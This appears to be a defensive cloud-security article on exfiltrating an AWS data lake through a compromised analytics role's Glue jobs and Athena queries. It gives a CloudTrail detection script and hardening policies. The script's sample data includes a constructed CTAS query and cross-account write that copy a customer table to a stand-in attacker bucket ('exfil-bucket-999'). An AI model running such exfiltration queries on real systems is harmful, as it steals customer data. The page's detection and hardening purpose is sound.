Glue and Athena exfiltration: the data lake leaves through the front door
A compromised analytics role runs normal Glue jobs and Athena queries, but writes the results to an attacker bucket. The activity is routine. The destination is the tell.
Glue and Athena are everyday analytics tools, which is exactly why a compromised analytics role can drain the data lake in plain sight. The queries look like business as usual. What gives the attacker away is where the output goes.
How the attack works
Using a role that already runs ETL and SQL every day, the attacker starts a Glue job and runs an Athena CREATE TABLE AS SELECT whose external_location points at an S3 bucket outside the data-lake account boundary. Bulk objects sized to whole tables of customer records land in the attacker's bucket, and the role iterates jobs across more databases to widen the export to the same destination. None of it is hidden: CloudTrail management events record the Glue StartJobRun and Athena StartQueryExecution calls, the Glue job-run history and the Athena query history keep the job and the query text, and S3 data events record every PutObject into the external bucket. In ATT&CK terms this is T1530, Data from Cloud Storage, with T1567.002, Exfiltration to Cloud Storage.
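Since the destination is the tell, the detection worth running is one that pulls every output location out of those records and compares it with the lake boundary. The following is an added example, not code from this page or from GraphLattice: it walks a handful of constructed CloudTrail records (CloudTrail field layout, but hypothetical account IDs, role and bucket names) and reports, per role, each Athena result location, CTAS external_location, or S3 PutObject that points outside the approved buckets or at a bucket owned by another account. The approved-bucket set and the lake account ID are assumptions to replace with your own.

```python
"""Flag Glue, Athena and S3 activity whose output lands outside the data-lake boundary.
Added example, not the page's or GraphLattice's code; the CloudTrail records below are
constructed (CloudTrail field layout, hypothetical account IDs, role and bucket names)."""
import re
from collections import defaultdict

LAKE_ACCOUNT = "111111111111"  # hypothetical lake account
APPROVED_BUCKETS = {"lake-curated-111111111111", "athena-results-111111111111"}  # hypothetical
S3_BUCKET = re.compile(r"s3://([^/\s'\"]+)")
# A CTAS statement names its own destination: WITH (external_location = 's3://...').
EXTERNAL_LOCATION = re.compile(r"external_location\s*=\s*'(s3://[^']+)'", re.IGNORECASE)


def bucket_of(s3_uri):
    """'s3://bucket/prefix/' -> 'bucket'; None for anything that is not an S3 URI."""
    m = S3_BUCKET.match(s3_uri or "")
    return m.group(1) if m else None


def session_of(event):
    """Role ARN behind an assumed-role session, falling back to the principal ARN."""
    ident = event.get("userIdentity", {})
    issuer = (ident.get("sessionContext") or {}).get("sessionIssuer") or {}
    return issuer.get("arn") or ident.get("arn")


def destinations(event):
    """(bucket, owner_account) pairs the record shows a write to. Athena StartQueryExecution
    exposes the result location and the query text (so a CTAS external_location is visible);
    Glue StartJobRun names the job but not its output path, so for Glue the S3 data event
    is the evidence. Owner is None when the record does not state it."""
    source, name = event.get("eventSource"), event.get("eventName")
    params = event.get("requestParameters") or {}
    found = []
    if source == "athena.amazonaws.com" and name == "StartQueryExecution":
        out = (params.get("resultConfiguration") or {}).get("outputLocation")
        if out:
            found.append((bucket_of(out), None))
        for ext in EXTERNAL_LOCATION.findall(params.get("queryString", "")):
            found.append((bucket_of(ext), None))
    elif source == "s3.amazonaws.com" and name == "PutObject":
        # The AWS::S3::Bucket entry under `resources` carries the bucket owner's account ID.
        owner = next((r.get("accountId") for r in event.get("resources", [])
                      if r.get("type") == "AWS::S3::Bucket"), None)
        found.append((params.get("bucketName"), owner))
    return found


def is_external(bucket, owner):
    """Outside the boundary if another account owns the bucket or it is not an approved one."""
    if bucket is None:
        return False
    return (owner is not None and owner != LAKE_ACCOUNT) or bucket not in APPROVED_BUCKETS


def scan(events):
    """Map each role to the (eventName, bucket) writes that crossed the boundary, in order."""
    findings = defaultdict(list)
    for ev in events:
        for bucket, owner in destinations(ev):
            if is_external(bucket, owner):
                findings[session_of(ev)].append((ev["eventName"], bucket))
    return dict(findings)


ROLE = "arn:aws:iam::111111111111:role/analytics-etl"  # hypothetical compromised role
IDENTITY = {"type": "AssumedRole", "arn": "arn:aws:sts::111111111111:assumed-role/analytics-etl/etl",
            "sessionContext": {"sessionIssuer": {"type": "Role", "arn": ROLE}}}
RESULTS = {"outputLocation": "s3://athena-results-111111111111/"}
CTAS = ("CREATE TABLE tmp.c WITH (format='PARQUET', external_location='s3://exfil-bucket-999/customers/') "
        "AS SELECT * FROM crm.customers")

# Constructed sample: a routine query, the CTAS aimed outside, the Glue run, the matching
# cross-account PutObject, and a legitimate write into the lake for contrast.
SAMPLE_EVENTS = [
    {"eventSource": "athena.amazonaws.com", "eventName": "StartQueryExecution", "userIdentity": IDENTITY,
     "requestParameters": {"queryString": "SELECT count(*) FROM sales.orders", "resultConfiguration": RESULTS}},
    {"eventSource": "athena.amazonaws.com", "eventName": "StartQueryExecution", "userIdentity": IDENTITY,
     "requestParameters": {"queryString": CTAS, "workGroup": "analytics", "resultConfiguration": RESULTS}},
    {"eventSource": "glue.amazonaws.com", "eventName": "StartJobRun", "userIdentity": IDENTITY,
     "requestParameters": {"jobName": "nightly-customer-export"}},
    {"eventSource": "s3.amazonaws.com", "eventName": "PutObject", "userIdentity": IDENTITY,
     "requestParameters": {"bucketName": "exfil-bucket-999", "key": "customers/part-00000.parquet"},
     "resources": [{"type": "AWS::S3::Bucket", "ARN": "arn:aws:s3:::exfil-bucket-999", "accountId": "999999999999"}]},
    {"eventSource": "s3.amazonaws.com", "eventName": "PutObject", "userIdentity": IDENTITY,
     "requestParameters": {"bucketName": "lake-curated-111111111111", "key": "orders/part-00000.parquet"},
     "resources": [{"type": "AWS::S3::Bucket", "ARN": "arn:aws:s3:::lake-curated-111111111111",
                    "accountId": LAKE_ACCOUNT}]},
]

if __name__ == "__main__":
    for role, writes in scan(SAMPLE_EVENTS).items():
        print(role, *[f"\n  {name} -> s3://{bucket}" for name, bucket in writes])
```

Run it over your own CloudTrail export by replacing SAMPLE_EVENTS with the parsed records; the Glue StartJobRun record produces no finding on its own, which is the point of pairing management events with S3 data events on the lake account's trail.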
Why it works
The analytics role held blanket Glue and Athena permissions and an S3 write grant broad enough to put objects into any bucket, including one in another account; a cross-account write needs only that grant plus the destination bucket's own policy, and the attacker controls the destination. Nothing pinned the Athena workgroup's result location or the Glue job's output path to an approved bucket, and no organization-level guardrail denied a write across the account boundary.
How to fix it
Do not kill Glue or delete the lake buckets: that breaks legitimate analytics and destroys evidence. Instead, strip the compromised role's Glue, Athena, and S3 write permissions; cut off its live sessions with a deny conditioned on aws:TokenIssueTime, so credentials issued before the cutoff stop working without waiting for them to expire; and add an explicit deny, in the role's policy or a service control policy, for writes to the external destination. The non-obvious move is to constrain the egress path itself: set the Athena workgroup to override client-side settings so its result location applies to every query in it, scope the Glue job role's s3:PutObject to approved buckets, and add an organization guardrail (a service control policy conditioned on aws:ResourceOrgID) that denies any write to a bucket outside the organization, so a future over-broad role still cannot ship data out.
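The weakness described under "Why it works" and the fix above both come down to policy documents, so the useful thing to have is the documents themselves. The block below is an added example, not the page's or GraphLattice's code: it builds the session-revocation deny, the organization-wide egress SCP, the scoped Glue job-role policy and the Athena workgroup update as the dicts you would hand to boto3 (iam.put_role_policy, organizations.create_policy, athena.update_work_group), and includes a small check of the two deny conditions to show why a bucket outside the organization is caught. Organization ID, account ID, bucket names, workgroup name and the cutoff timestamp are hypothetical placeholders, and the checker covers only those two conditions, not IAM evaluation in general.

```python
"""Containment and hardening policies for the scenario, built as Python dicts.
Added example, not the page's or GraphLattice's own code. Account ID, org ID, role,
bucket, workgroup and timestamp values are hypothetical placeholders."""
import json
from datetime import datetime, timezone

LAKE_ACCOUNT = "111111111111"  # hypothetical
ORG_ID = "o-exampleorg1"       # hypothetical organization ID
APPROVED_BUCKETS = ["lake-curated-111111111111", "athena-results-111111111111"]  # hypothetical


def revoke_sessions_policy(issued_before):
    """Inline deny for the compromised role (iam.put_role_policy PolicyDocument): credentials
    issued before `issued_before` (ISO 8601, UTC) stop working instead of living out their TTL."""
    return {"Version": "2012-10-17", "Statement": [{
        "Effect": "Deny", "Action": "*", "Resource": "*",
        "Condition": {"DateLessThan": {"aws:TokenIssueTime": issued_before}}}]}


def egress_perimeter_scp(org_id):
    """SCP (organizations.create_policy Content): deny S3 object writes to any bucket not owned
    inside the org. aws:ResourceOrgID is absent for a bucket outside the org, and StringNotEquals
    on an absent key evaluates true, so the deny fires for exactly those buckets."""
    return {"Version": "2012-10-17", "Statement": [{
        "Sid": "DenyS3WriteOutsideOrg", "Effect": "Deny",
        "Action": ["s3:PutObject", "s3:PutObjectAcl"], "Resource": "*",
        "Condition": {"StringNotEquals": {"aws:ResourceOrgID": org_id}}}]}


def glue_job_role_policy(buckets):
    """Identity policy for the Glue job role: its scripts may write only into approved buckets."""
    return {"Version": "2012-10-17", "Statement": [{
        "Effect": "Allow", "Action": "s3:PutObject",
        "Resource": [f"arn:aws:s3:::{b}/*" for b in buckets]}]}


def athena_workgroup_update(workgroup, results_bucket):
    """Arguments for athena.update_work_group: with EnforceWorkGroupConfiguration the
    workgroup's result location overrides whatever output location a client supplies."""
    return {"WorkGroup": workgroup, "ConfigurationUpdates": {
        "EnforceWorkGroupConfiguration": True,
        "ResultConfigurationUpdates": {"OutputLocation": f"s3://{results_bucket}/"}}}


def _utc(stamp):
    return datetime.fromisoformat(stamp.replace("Z", "+00:00")).astimezone(timezone.utc)


def put_object_allowed(bucket_org_id, token_issue_time, scp, revoke_policy):
    """Apply only the two deny conditions above to one s3:PutObject; this is not an IAM
    simulator. bucket_org_id is None for a bucket that belongs to no organization."""
    scp_org = scp["Statement"][0]["Condition"]["StringNotEquals"]["aws:ResourceOrgID"]
    if bucket_org_id != scp_org:  # absent or foreign org ID: StringNotEquals matches, deny wins
        return False
    cutoff = revoke_policy["Statement"][0]["Condition"]["DateLessThan"]["aws:TokenIssueTime"]
    if _utc(token_issue_time) < _utc(cutoff):  # session minted before the revocation cutoff
        return False
    return True


if __name__ == "__main__":
    docs = {
        "revoke-analytics-etl-sessions": revoke_sessions_policy("2024-05-01T12:00:00Z"),
        "egress-perimeter-scp": egress_perimeter_scp(ORG_ID),
        "glue-job-role-s3-write": glue_job_role_policy(APPROVED_BUCKETS),
        "athena-workgroup-update": athena_workgroup_update("analytics", APPROVED_BUCKETS[1]),
    }
    for name, doc in docs.items():
        print(f"== {name}\n{json.dumps(doc, indent=2)}")
```

The revocation deny is the same document the IAM console's "Revoke active sessions" action attaches, with the timestamp set to the moment you decide the role is compromised; remove it once the role's trust and permissions have been rebuilt. The SCP is the durable guardrail: it applies to every principal in the organization, so it catches the next over-broad role as well as this one.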
Practice it
We built this as a GraphLattice Range scenario so responders learn to scope the abused role and block the destination, rather than nuking the analytics platform.